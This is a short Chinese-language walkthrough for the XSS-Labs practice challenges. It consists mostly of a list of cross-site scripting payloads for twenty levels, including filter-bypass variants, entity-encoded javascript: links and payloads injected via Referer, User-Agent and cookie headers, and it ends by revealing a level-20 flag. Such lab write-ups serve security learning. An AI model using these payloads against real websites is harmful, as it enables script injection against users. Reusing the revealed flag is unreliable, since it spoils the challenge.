XSS-Lab

1.关于20关的payload合集。

复制代码
<script>alert(1)</script>
"><script>alert(1)</script>
'onclick='alert(1)
" onclick="alert(1)
"><a href="javascript:alert(1)">
"><a HrEf="javascript:alert(1)">
"><scscriptript>alert(1)</sscriptcript>
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://
?t_sort=" type="text" onclick="alert('xss')
" type="text" onmousemove="alert(1)    #将payload写到referer里
" type="text" onmousemove="alert(1) 	 #将payload写User-Agent头
" type="text" onmousemove="alert(1)    #将payload写cookie头
payload是一张图片马
http://127.0.0.1/xss-labs-master/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'
http://127.0.0.1/xss-labs-master/level16.php?keyword=<img%0dsrc=1%0donerror=alert(1)>
http://127.0.0.1/xss-labs-master/level17.php?arg01=a&arg02=aaa onmousemove='alert(1)'
http://127.0.0.1/xss-labs-master/level18.php?arg01=a&arg02=aaa onmousemove='alert(1)'
arg01=version&arg02=<a href="javascript:alert(1)">123</a>
arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)

10.修改参数

修改

点击

20.如果不想走流程,可直接跳过前往20关获得flag

复制代码
http://a2f864e8-582b-4d62-a066-a1fd17700dd2.node5.buuoj.cn:81/level20.php
查看源码获得
flag{ad270776-5056-479e-8119-fcf63393d388}

右键查看源码,获得flag{ad270776-5056-479e-8119-fcf63393d388}

相关推荐
灵感__idea6 小时前
Hello 算法:贪心的世界
前端·javascript·算法
星河耀银海7 小时前
远控体验分享:安全与实用性参考
人工智能·安全·微服务
GreenTea7 小时前
一文搞懂Harness Engineering与Meta-Harness
前端·人工智能·后端
赛博云推-Twitter热门霸屏工具8 小时前
Twitter运营完整流程:从0到引流获客全流程拆解(2026)
运维·安全·自动化·媒体·twitter
xixixi777778 小时前
通信领域的“中国速度”:从5G-A到6G,从地面到星空
人工智能·5g·安全·ai·fpga开发·多模态
killerbasd9 小时前
牧苏苏传 我不装了 4/7
前端·javascript·vue.js
吴声子夜歌9 小时前
ES6——二进制数组详解
前端·ecmascript·es6
码事漫谈9 小时前
手把手带你部署本地模型,让你Token自由(小白专属)
前端·后端
ZC跨境爬虫9 小时前
【爬虫实战对比】Requests vs Scrapy 笔趣阁小说爬虫,从单线程到高效并发的全方位升级
前端·爬虫·scrapy·html
爱上好庆祝9 小时前
svg图片
前端·css·学习·html·css3